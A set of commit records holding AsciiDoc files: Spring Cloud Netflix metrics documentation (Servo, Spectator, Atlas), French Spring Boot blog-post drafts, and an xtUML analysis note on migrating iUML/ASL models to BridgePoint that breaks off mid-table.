phased out in favor of Spectator, which is only designed to work with Java 8. Spring Cloud Netflix provides support for both, but Java 8 based applications are encouraged to use Spectator.\n\n=== Dimensional vs. Hierarchical Metrics\n\nSpring Boot Actuator metrics are hierarchical and metrics are separated only by name. These names often follow a naming convention that embeds key\/value attribute pairs (dimensions) into the name separated by periods. Consider the following metrics for two endpoints, root and star-star:\n\n[source,json]\n----\n{\n \"counter.status.200.root\": 20,\n \"counter.status.400.root\": 3,\n \"counter.status.200.star-star\": 5,\n}\n----\n\nThe first metric gives us a normalized count of successful requests against the root endpoint per unit of time. But what if the system had 20 endpoints and you want to get a count of successful requests against all the endpoints? Some hierarchical metrics backends would allow you to specify a wild card such as `counter.status.200.*` that would read all 20 metrics and aggregate the results. Alternatively, you could provide a `HandlerInterceptorAdapter` that intercepts and records a metric like `counter.status.200.all` for all successful requests irrespective of the endpoint, but now you must write 20+1 different metrics. Similarly if you want to know the total number of successful requests for all endpoints in the service, you could specify a wild card such as `counter.status.2*.*`.\n\nEven in the presence of wildcarding support on a hierarchical metrics backend, naming consistency can be difficult. Specifically the position of these tags in the name string can slip with time, breaking queries. For example, suppose we add an additional dimension to the hierarchical metrics above for HTTP method. Then `counter.status.200.root` becomes `counter.status.200.method.get.root`, etc. Our `counter.status.200.*` suddenly no longer has the same semantic meaning. Furthermore, if the new dimension is not applied uniformly across the codebase, certain queries may become impossible. This can quickly get out of hand.\n\nNetflix metrics are tagged (a.k.a. dimensional). Each metric has a name, but this single named metric can contain multiple statistics and 'tag' key\/value pairs that allows more querying flexibility. In fact, the statistics themselves are recorded in a special tag.\n\nRecorded with Netflix Servo or Spectator, a timer for the root endpoint described above contains 4 statistics per status code, where the count statistic is identical to Spring Boot Actuator's counter. In the event that we have encountered an HTTP 200 and 400 thus far, there will be 8 available data points:\n\n[source,json]\n----\n{\n \"root(status=200,stastic=count)\": 20,\n \"root(status=200,stastic=max)\": 0.7265630630000001,\n \"root(status=200,stastic=totalOfSquares)\": 0.04759702862580789,\n \"root(status=200,stastic=totalTime)\": 0.2093076914666667,\n \"root(status=400,stastic=count)\": 1,\n \"root(status=400,stastic=max)\": 0,\n \"root(status=400,stastic=totalOfSquares)\": 0,\n \"root(status=400,stastic=totalTime)\": 0,\n}\n----\n\n=== Default Metrics Collection\n\nWithout any additional dependencies or configuration, a Spring Cloud based service will autoconfigure a Servo `MonitorRegistry` and begin collecting metrics on every Spring MVC request. By default, a Servo timer with the name `rest` will be recorded for each MVC request which is tagged with:\n\n1. HTTP method\n2. HTTP status (e.g. 200, 400, 500)\n3. URI (or \"root\" if the URI is empty), sanitized for Atlas\n4. The exception class name, if the request handler threw an exception\n5. The caller, if a request header with a key matching `netflix.metrics.rest.callerHeader` is set on the request. There is no default key for `netflix.metrics.rest.callerHeader`. You must add it to your application properties if you wish to collect caller information.\n\nSet the `netflix.metrics.rest.metricName` property to change the name of the metric from `rest` to a name you provide.\n\nIf Spring AOP is enabled and `org.aspectj:aspectjweaver` is present on your runtime classpath, Spring Cloud will also collect metrics on every client call made with `RestTemplate`. A Servo timer with the name of `restclient` will be recorded for each MVC request which is tagged with:\n\n1. HTTP method\n2. HTTP status (e.g. 200, 400, 500), \"CLIENT_ERROR\" if the response returned null, or \"IO_ERROR\" if an `IOException` occurred during the execution of the `RestTemplate` method\n3. URI, sanitized for Atlas\n4. Client name\n\n[[netflix-metrics-spectator]]\n=== Metrics Collection: Spectator\n\nTo enable Spectator metrics, include a dependency on `spring-boot-starter-spectator`:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-spectator<\/artifactId>\n <\/dependency>\n----\n\nIn Spectator parlance, a meter is a named, typed, and tagged configuration and a metric represents the value of a given meter at a point in time. Spectator meters are created and controlled by a registry, which currently has several different implementations. Spectator provides 4 meter types: counter, timer, gauge, and distribution summary.\n\nSpring Cloud Spectator integration configures an injectable `com.netflix.spectator.api.Registry` instance for you. Specifically, it configures a `ServoRegistry` instance in order to unify the collection of REST metrics and the exporting of metrics to the Atlas backend under a single Servo API. Practically, this means that your code may use a mixture of Servo monitors and Spectator meters and both will be scooped up by Spring Boot Actuator `MetricReader` instances and both will be shipped to the Atlas backend.\n\n==== Spectator Counter\n\nA counter is used to measure the rate at which some event is occurring.\n\n[source,java]\n----\n\/\/ create a counter with a name and a set of tags\nCounter counter = registry.counter(\"counterName\", \"tagKey1\", \"tagValue1\", ...);\ncounter.increment(); \/\/ increment when an event occurs\ncounter.increment(10); \/\/ increment by a discrete amount\n----\n\nThe counter records a single time-normalized statistic.\n\n==== Spectator Timer\n\nA timer is used to measure how long some event is taking. Spring Cloud automatically records timers for Spring MVC requests and conditionally `RestTemplate` requests, which can later be used to create dashboards for request related metrics like latency:\n\n.Request Latency\nimage::RequestLatency.png []\n\n[source,java]\n----\n\/\/ create a timer with a name and a set of tags\nTimer timer = registry.timer(\"timerName\", \"tagKey1\", \"tagValue1\", ...);\n\n\/\/ execute an operation and time it at the same time\nT result = timer.record(() -> fooReturnsT());\n\n\/\/ alternatively, if you must manually record the time\nLong start = System.nanoTime();\nT result = fooReturnsT();\ntimer.record(System.nanoTime() - start, TimeUnit.NANOSECONDS);\n----\n\nThe timer simultaneously records 4 statistics: count, max, totalOfSquares, and totalTime. The count statistic will always match the single normalized value provided by a counter if you had called `increment()` once on the counter for each time you recorded a timing, so it is rarely necessary to count and time separately for a single operation.\n\nFor link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Timer-Usage#longtasktimer[long running operations], Spectator provides a special `LongTaskTimer`.\n\n==== Spectator Gauge\n\nGauges are used to determine some current value like the size of a queue or number of threads in a running state. Since gauges are sampled, they provide no information about how these values fluctuate between samples.\n\nThe normal use of a gauge involves registering the gauge once in initialization with an id, a reference to the object to be sampled, and a function to get or compute a numeric value based on the object. The reference to the object is passed in separately and the Spectator registry will keep a weak reference to the object. If the object is garbage collected, then Spectator will automatically drop the registration. See link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Gauge-Usage#using-lambda[the note] in Spectator's documentation about potential memory leaks if this API is misused.\n\n[source,java]\n----\n\/\/ the registry will automatically sample this gauge periodically\nregistry.gauge(\"gaugeName\", pool, Pool::numberOfRunningThreads);\n\n\/\/ manually sample a value in code at periodic intervals -- last resort!\nregistry.gauge(\"gaugeName\", Arrays.asList(\"tagKey1\", \"tagValue1\", ...), 1000);\n----\n\n==== Spectator Distribution Summaries\n\nA distribution summary is used to track the distribution of events. It is similar to a timer, but more general in that the size does not have to be a period of time. For example, a distribution summary could be used to measure the payload sizes of requests hitting a server.\n\n[source,java]\n----\n\/\/ the registry will automatically sample this gauge periodically\nDistributionSummary ds = registry.distributionSummary(\"dsName\", \"tagKey1\", \"tagValue1\", ...);\nds.record(request.sizeInBytes());\n----\n\n[[netflix-metrics-servo]]\n=== Metrics Collection: Servo\n\nWARNING: If your code is compiled on Java 8, please use Spectator instead of Servo as Spectator is destined to replace Servo entirely in the long term.\n\nIn Servo parlance, a monitor is a named, typed, and tagged configuration and a metric represents the value of a given monitor at a point in time. Servo monitors are logically equivalent to Spectator meters. Servo monitors are created and controlled by a `MonitorRegistry`. In spite of the above warning, Servo does have a link:https:\/\/github.com\/Netflix\/servo\/wiki\/Getting-Started[wider array] of monitor options than Spectator has meters.\n\nSpring Cloud integration configures an injectable `com.netflix.servo.MonitorRegistry` instance for you. Once you have created the appropriate `Monitor` type in Servo, the process of recording data is wholly similar to Spectator.\n\n==== Creating Servo Monitors\n\nIf you are using the Servo `MonitorRegistry` instance provided by Spring Cloud (specifically, an instance of `DefaultMonitorRegistry`), Servo provides convenience classes for retrieving link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Servo-Comparison#dynamiccounter[counters] and link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Servo-Comparison#dynamictimer[timers]. These convenience classes ensure that only one `Monitor` is registered for each unique combination of name and tags.\n\nTo manually create a Monitor type in Servo, especially for the more exotic monitor types for which convenience methods are not provided, instantiate the appropriate type by providing a `MonitorConfig` instance:\n\n[source,java]\n----\nMonitorConfig config = MonitorConfig.builder(\"timerName\").withTag(\"tagKey1\", \"tagValue1\").build();\n\n\/\/ somewhere we should cache this Monitor by MonitorConfig\nTimer timer = new BasicTimer(config);\nmonitorRegistry.register(timer);\n----\n\n[[netflix-metrics-atlas]]\n=== Metrics Backend: Atlas\n\nAtlas was developed by Netflix to manage dimensional time series data for near real-time operational insight. Atlas features in-memory data storage, allowing it to gather and report very large numbers of metrics, very quickly.\n\nAtlas captures operational intelligence. Whereas business intelligence is data gathered for analyzing trends over time, operational intelligence provides a picture of what is currently happening within a system.\n\nSpring Cloud provides a `spring-cloud-starter-atlas` that has all the dependencies you need. Then just annotate your Spring Boot application with `@EnableAtlas` and provide a location for your running Atlas server with the `netflix.atlas.uri` property.\n\n==== Global tags\n\nSpring Cloud enables you to add tags to every metric sent to the Atlas backend. Global tags can be used to separate metrics by application name, environment, region, etc.\n\nEach bean implementing `AtlasTagProvider` will contribute to the global tag list:\n\n[source,java]\n----\n@Bean\nAtlasTagProvider atlasCommonTags(\n @Value(\"${spring.application.name}\") String appName) {\n return () -> Collections.singletonMap(\"app\", appName);\n}\n----\n\n==== Using Atlas\n\nTo bootstrap a in-memory standalone Atlas instance:\n\n[source,bash]\n----\n$ curl -LO https:\/\/github.com\/Netflix\/atlas\/releases\/download\/v1.4.2\/atlas-1.4.2-standalone.jar\n$ java -jar atlas-1.4.2-standalone.jar\n----\n\nTIP: An Atlas standalone node running on an r3.2xlarge (61GB RAM) can handle roughly 2 million metrics per minute for a given 6 hour window.\n\nOnce running and you have collected a handful of metrics, verify that your setup is correct by listing tags on the Atlas server:\n\n[source,bash]\n----\n$ curl http:\/\/ATLAS\/api\/v1\/tags\n----\n\nTIP: After executing several requests against your service, you can gather some very basic information on the request latency of every request by pasting the following url in your browser: `http:\/\/ATLAS\/api\/v1\/graph?q=name,rest,:eq,:avg`\n\nThe Atlas wiki contains a link:https:\/\/github.com\/Netflix\/atlas\/wiki\/Single-Line[compilation of sample queries] for various scenarios.\n\nMake sure to check out the link:https:\/\/github.com\/Netflix\/atlas\/wiki\/Alerting-Philosophy[alerting philosophy] and docs on using link:https:\/\/github.com\/Netflix\/atlas\/wiki\/DES[double exponential smoothing] to generate dynamic alert thresholds.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e90a9e68b44a20dd215b7b530e7b22bc9d50d52e","subject":"Update 2015-06-06-Lorem-ipsum-2.adoc","message":"Update 2015-06-06-Lorem-ipsum-2.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-06-Lorem-ipsum-2.adoc","new_file":"_posts\/2015-06-06-Lorem-ipsum-2.adoc","new_contents":"= Lorem ipsum 2\n\n1 - R\u00e9conciliez vous avec Spring\n================================\nJe travaille depuis plusieurs semaines avec Spring Boot. Je dois avouer que l'id\u00e9e de mettre en place ce nouvel outil ne m'enchantait g\u00e8re. Bien s\u00fbr j'avais eu de bons retours mais apr\u00e8s plusieurs ann\u00e9es, je m'\u00e9tais lass\u00e9 de l'\u00e9cosyst\u00e8me Spring : trop lourd, trop de librairies, trop JEE ... Je continuais \u00e0 utiliser Spring dans mes projets plus par habitude que par conviction.\n\nJe dois admettre que Spring Boot est aujourd'hui une \u00e9vidence pour moi ; c'est le projet qui a rendu \u00e0 Spring sa simplicit\u00e9 d'origine (et sans XML s'il vous plait).\n\nPrenons l'application REST suivante :\n\n[source,java]\n.Classe principale\n----\n@Configuration\n@EnableAutoConfiguration\n@ComponentScan\npublic class Application {\n \n\tpublic static void main(String[] args) {\n \tSpringApplication.run(Application.class, args);\n\t}\n \n}\n----\n\n[source,java]\n.Services REST\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n\n\t@RequestMapping(method = RequestMethod.GET)\n public String ping() {\n \treturn \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n }\n}\n----\n\n*Voil\u00e0, c'est tout !*\n\nEn effet, plus de configuration XML, plus de d\u00e9claration de beans \u00e0 rallonge, plus de web.xml. Tout n'est pas nouveau bien s\u00fbr (configuration Java notamment) mais Spring Boot \u00e0 pousser la logique de simplification entam\u00e9e par Spring depuis plusieurs ann\u00e9es \u00e0 son maximum.\n\nEn effet, nous avons ici une application web compl\u00e8te qu'il est possible de lancer dans la foul\u00e9e (oui sans serveur d'application...en apparence, nous y reviendrons) :\n\n[source,bash]\n----\n...\n2015-05-27 14:28:49.114  INFO 50883 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 2102 ms\n----\n\navec le test correspondant :\n\n[source,bash]\n----\n~$ curl http:\/\/localhost:8080\/api\n{\"status\":\"OK\",\"timestamp\":\"1432733392861\"}\n----\n \n2 - KISS (\"Keep It Simple, Stupid\")\n===================================\nblabla","old_contents":"= Lorem ipsum 2\n\n1 - R\u00e9conciliez vous avec Spring\n================================\nJe travaille depuis plusieurs semaines avec Spring Boot. Je dois avouer que l'id\u00e9e de mettre en place ce nouvel outil ne m'enchantait g\u00e8re. Bien s\u00fbr j'avais eu de bons retours mais apr\u00e8s plusieurs ann\u00e9es, je m'\u00e9tais lass\u00e9 de l'\u00e9cosyst\u00e8me Spring : trop lourd, trop de librairies, trop JEE ... Je continuais \u00e0 utiliser Spring dans mes projets plus par habitude que par conviction.\n\nJe dois admettre que Spring Boot est aujourd'hui une \u00e9vidence pour moi ; c'est le projet qui a rendu \u00e0 Spring sa simplicit\u00e9 d'origine (et sans XML s'il vous plait).\n\nPrenons l'application REST suivante :\n\n[source,java]\n.Classe principale\n----\n@Configuration\n@EnableAutoConfiguration\n@ComponentScan\npublic class Application {\n \n\tpublic static void main(String[] args) {\n \tSpringApplication.run(Application.class, args);\n\t}\n \n}\n----\n\n[source,java]\n.Services REST\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n\n@RequestMapping(method = RequestMethod.GET)\n public\n @ResponseBody\n String ping() {\n \treturn \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n }\n}\n----\n\n*Voil\u00e0, c'est tout !*\n\nEn effet, plus de configuration XML, plus de d\u00e9claration de beans \u00e0 rallonge, plus de web.xml. Tout n'est pas nouveau bien s\u00fbr (configuration Java notamment) mais Spring Boot \u00e0 pousser la logique de simplification entam\u00e9e par Spring depuis plusieurs ann\u00e9es \u00e0 son maximum.\n\nEn effet, nous avons ici une application web compl\u00e8te qu'il est possible de lancer dans la foul\u00e9e (oui sans serveur d'application...en apparence, nous y reviendrons) :\n\n[source,bash]\n----\n...\n2015-05-27 14:28:49.114  INFO 50883 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 2102 ms\n----\n\navec le test correspondant :\n\n[source,bash]\n----\n~$ curl http:\/\/localhost:8080\/api\n{\"status\":\"OK\",\"timestamp\":\"1432733392861\"}\n----\n \n2 - KISS (\"Keep It Simple, Stupid\")\n===================================\nblabla","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c3739d02c62d32f83a5073feb87736aa96d5a935","subject":"Update 2015-06-08-A-remplacer-1.adoc","message":"Update 2015-06-08-A-remplacer-1.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-08-A-remplacer-1.adoc","new_file":"_posts\/2015-06-08-A-remplacer-1.adoc","new_contents":"= A remplacer - 1\n\nThis is an H1\n=============\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\n[source,java]\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n @RequestMapping(method = RequestMethod.GET)\n public\n @ResponseBody\n String ping() {\n \treturn \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n }\n}\n----\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.","old_contents":"= A rempla\n\nThis is an H1\n=============\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\n[source,java]\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n @RequestMapping(method = RequestMethod.GET)\n public\n @ResponseBody\n String ping() {\n \treturn \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n }\n}\n----\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"39c2d4a0ec193f335d65f41c9e8a4164a33eebc3","subject":"job: #10414 Add recommendation to build example ASL model (GPS Watch).","message":"job: #10414 Add recommendation to build example ASL model (GPS Watch).\n","repos":"leviathan747\/mc,cortlandstarrett\/mc,lwriemen\/mc,xtuml\/mc,cortlandstarrett\/mc,lwriemen\/mc,cortlandstarrett\/mc,keithbrown\/mc,cortlandstarrett\/mc,rmulvey\/mc,xtuml\/mc,rmulvey\/mc,leviathan747\/mc,rmulvey\/mc,leviathan747\/mc,keithbrown\/mc,keithbrown\/mc,keithbrown\/mc,lwriemen\/mc,lwriemen\/mc,xtuml\/mc,xtuml\/mc,lwriemen\/mc,keithbrown\/mc,leviathan747\/mc,keithbrown\/mc,lwriemen\/mc,xtuml\/mc,cortlandstarrett\/mc,rmulvey\/mc,cortlandstarrett\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,xtuml\/mc,rmulvey\/mc","old_file":"doc\/notes\/10414_wasl\/10414_wasl_ant.adoc","new_file":"doc\/notes\/10414_wasl\/10414_wasl_ant.adoc","new_contents":"= Analyze Options for ASL BridgePoint\n\nxtUML Project Analysis Note\n\n:sectnums:\n\n== Abstract\n\nThis note documents research into a migration of Shlaer-Mellor application\nmodels from iUML into BridgePoint. Options are explored, and observations\nare recorded.\n\n== Document References\n\n. [[dr-1]] https:\/\/support.onefact.net\/issues\/10414[10414 Analyze Options for Migration]\n. [[dr-2]] https:\/\/docs.google.com\/document\/d\/1LQYNA7Zln1h8h8wbRNeZb0GukVMXLV89nSwg8SICeG4\/edit[SRS - Software Requirements Specification for client Assessment]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/8269[8269 - Raven Project Phase 1]\n. [[dr-4]] http:\/\/www.ooatool.com\/docs\/ASL03.pdf[UML ASL Reference Guide]\n. [[dr-5]] link:..\/8073_masl_parser\/8277_serial_masl_spec.md[Serial MASL (SMASL) Specification]\n. [[dr-6]] https:\/\/www.youtube.com\/watch?v=lmZJ44ceDD8[OAL Context-Sensitive Content Assist]\n. [[dr-7]] link:ExtractionWithHeaders.xlsx[File Formats: Extraction with Headers]\n. [[dr-8]] TBD - delivered prototype(s)\n. [[dr-9]] http:\/\/www.eclipse.org\/[Eclipse - IDE Framework from the Eclipse Foundation]\n\n== Introduction and Background\n\nAs of 2017, models built with iUML and having _MASL_ (_Model and Action\nSpecification Language_) activities (action language bodies) can be migrated\ninto BridgePoint using a tool chain built for project Raven [<<dr-3,2.3>>].\nIn Raven, tools were constructed to convert iUML models expressed as MASL\ninto xtUML. The xtUML could then be imported into BridgePoint. Tools were\nbuilt to export xtUML models (back) into the MASL format. A similar process\nis desired for models built with iUML and having _ASL_ (_Action Specification\nLanguage_), activities. In the new flow, tools would be used to convert iUML\nmodels in WASL format into xtUML. Tools would be available to export xtUML\nmodels from BridgePoint (back) into the WASL format.\n\nThe native iUML action language, ASL, has a syntax in the public domain.\nA language reference for it can be found in [<<dr-4,2.4>>]. ASL is\nfundamentally similar to _OAL_ (_Object Action Language_), the default\naction language of BridgePoint, however it is a bit richer and supports\ninstance identity more tightly on the create statement. There are other\nadvantages and disadvantages as described in <<Action Language Comparison>>.\n\niUML models can be represented in a form consumable by a software\narchitecture (model compiler) called _WACA_ (_Waterloo Auto Code\nGenerator and Architecture_). This form shall be denoted _WASL_\n(WACA-with-ASL).\n\nSeveral paths exist to move forward from iUML\/ASL. This assessment is\nintended to traverse these paths and explore different options which enable\nShlaer-Mellor Model-Driven Development to continue into future engineering\nprojects. Options include changing the model editing environment and\nswitching to a different action language. However, it is desired that\nthe back end model compiler tool chain be preserved to a large extent.\n\nThe highlights of this assessment report include:\n\n- choice of action language\n- challenge of transforming WASL to xtUML (for conversion\/import)\n- challenge of generating WASL from xtUML (export to model compiler)\n- loss and regeneration\/re-layout of model graphical diagram information\n- testing and validation of the integrity of the conversions\n\nThe following figure <<wasl-flow>> will be referenced throughout the report.\nTwo flows are outlined, import (upper flow) and export (lower flow). The\ngreen triangular glyph represents xtUML. 'SMASL' is a serialized form\nof Shlaer-Mellor meta-model instances. 'm2x' is a converter of SMASL\nto xtUML. 'x2m' is a converter of xtUML to SMASL. 'wasl' is a converter\nof SMASL to WASL.\n\n[[wasl-flow]]\nimage::waslflow.png[WASL-to-xtUML and xtUML-to-WASL Flows]\nWASL-to-xtUML and xtUML-to-WASL Flows\n\nIn the following sections, the report (re)states the requirements of the\nAssessment and then provides substantial analysis. After the analysis\nis a section drawing conclusions and posing recommendations.\n\n== Requirements\n\nRequirements for an assessment of migration options are defined in a\nSoftware Requirements Specification (SRS) document [<<dr-2,2.2>>].\nThe requirements are repeated here with minor refinement.\n\n=== (A2.1) Action Language SWOT\nAnalyze the relative strengths, weaknesses, opportunities and threats of\nASL versus MASL versus OAL moving forward.\n\n=== (A2.2) ASL Editor\nExplore and size an ASL action language syntax highlighting editor.\n\n=== (A2.3) WASL2MASL\nAnalyze the costs and benefits of building a tool to convert WASL to MASL.\n\n=== (A2.4) WASL2xtUML\nUnderstand the work required to convert models from iUML-ASL (WASL) into\nxtUML to be edited within BridgePoint (model conversion and import).\n\n==== (A2.4.1) Diagram Editing\nEnumerate diagram editing issues anticipated as part of model conversion\nand ongoing editing of Kennedy-Carter idiom models in BridgePoint.\nInclude graphics issues and known differences between dialects of xtUML.\n\n=== (A2.5) xtUML2WASL\nDetermine a strategy for exporting xtUML into the existing model compiler\ntool chain (model export). Determine packaging for the extraction tool\nas a BridgePoint plugin, standalone tool or both.\n\n=== (A2.6) File Formats\nIsolate the interface to the model compilation tool chain and document\nfile formats noting that example files are supplied by the client.\n\n=== (A2.7) Integrity\nDefine steps to ensure and validate the integrity of models through\nthe conversion process.\n\n==== (A2.7.1) Round Trip\nExplore the use of \"round trip testing\" to automate the import and export\nand comparison of results.\n\n=== Decision Data\nFor each of the above requirements, consider the following:\n\n(A3) Sizings::\nEstablish relative sizings for various components and design choices.\n\n(A4) Open Sourcing:: [Removed from scope.]\n\n(A5) Talent Pool::\nRecommend the use of internal versus external talent and the community.\n\n(A6) Prototypes::\nDevelop working prototypes and\/or mock ups of workflows with screenshots\nleveraging supplied example files.\n\n(A7) Training::\nRecommend training in modeling and tooling or ad hoc consultation.\n\n(A8) Configuration Management::\niUML provides change configuration inside the tool (versions of domains\nand projects defined as a set of domains at a particular version).\nAnalysis shall propose a path to migrate a particular version of the\ncurrent application models and describe how configuration would be managed\nafter migration.\n\n(A9) Model Compiler Migration::\nFollowing UML tool migration, model compiler migration would be the\nlogical next step. Perform analysis and define a roadmap for this.\n\n== Analysis\n\nIn the following analysis the challenges of a tool migration from iUML\nto BridgePoint are explored. Each requirement listed above is independently\nanalyzed. Explanations provide insight into feasibility, engineering\ndifficulty and impact on the modelers using the tools.\n\nRough order of magnitude (ROM) estimates of effort are provided for many\nof the options. Note that these estimates are quite rough and based on\ninformation available at the time. Refinement of these estimates can be\nobtained through the design process as details into implementation are\ngathered. Please use these ROM effort estimates as just that, estimates.\nThe estimates are presented in units of (hu)man-weeks and man-months.\nCalendar time is not considered.\n\n=== Action Language Comparison\nAction language support is at the center of the challenges facing a tooling\nmigration. There are at least four action language possibilities in this\nmigration: ASL, OAL, MASL and Alf. Others may exist, but the ones explored\nand reported here can be considered true candidates.\n\nIt is important to note that some textual action languages are able\nto represent the structure of a model in addition to representing the\nprocessing of action bodies. For example, MASL has textual syntax to\nexpress the structure of classes and define associations between\nthem. MASL provides textual syntax to represent the entirety of\nthe semantics of Shlaer-Mellor models. Graphics are an additional view\nof the structural model information. Alf is another language that supplies\nsyntax for activities and (some) structural model elements. ASL and OAL\nare limited to expressing action processing. WASL extends ASL to include\na textual representation of structural Shlaer-Mellor.\n\n[options=\"header\"]\n|===\n| dialect | strengths | weaknesses | opportunities | threats\n| ASL | no change to existing flow | lack of BP interpreter | grow community | lack of parser\n| | direct pass-thru to WACA | not parsed (initially) | enhance BP |\n| | smallest change to tooling | no `else if` | |\n| | familiar to existing team | | |\n| | lowest initial cost | | |\n| | first step in any case | | |\n| | | | |\n| OAL | BridgePoint native default | conversion required | enhance syntax | behavior differences\n| | interpreted in Verifier | learning curve | go mainstream |\n| | large body of examples | less rich syntax | |\n| | alternate model compilers | | |\n| | | | |\n| MASL | richest syntax | conversion required | expressiveness | few users\n| | strongest typing | learning curve | broaden usage |\n| | local (UK) user community | | |\n| | proximity to Ada target | | |\n| | | | |\n| Alf | standardized by OMG | conversion required | standardization | distraction\n| | | gaps in the semantics | enhance BP |\n| | | lack of BP interpreter | |\n| | | overly complex syntax | |\n| | | learning curve | |\n|===\n\n=== ASL Editor\nAn ASL text editor could be produced that makes the experience of editing\nASL activities pleasant and productive (in that order!).\nThere are multiple levels of sophistication to preparing such an editor.\nListed here are features of a syntax highlighting editor ordered from\nrelatively easy to more challenging to implement.\n\nNo prototypes were produced of an ASL text editor.\n\n[options=\"header\"]\n|===\n| feature | description | parser | ROM effort\n| keyword highlighting | embolden and\/or colorize language key words | | 1 week\n| automatic indentation | Indent after `if`, `else`, `loop`, etc. | | 2 weeks\n| name validation | Rationalize identifiers with model elements. | required | 1 month\n| context-sensitive content assistance | auto-completion and selection lists | required | 2 months\n| rename\/refactoring | Update activities when model element names change. | required | 4 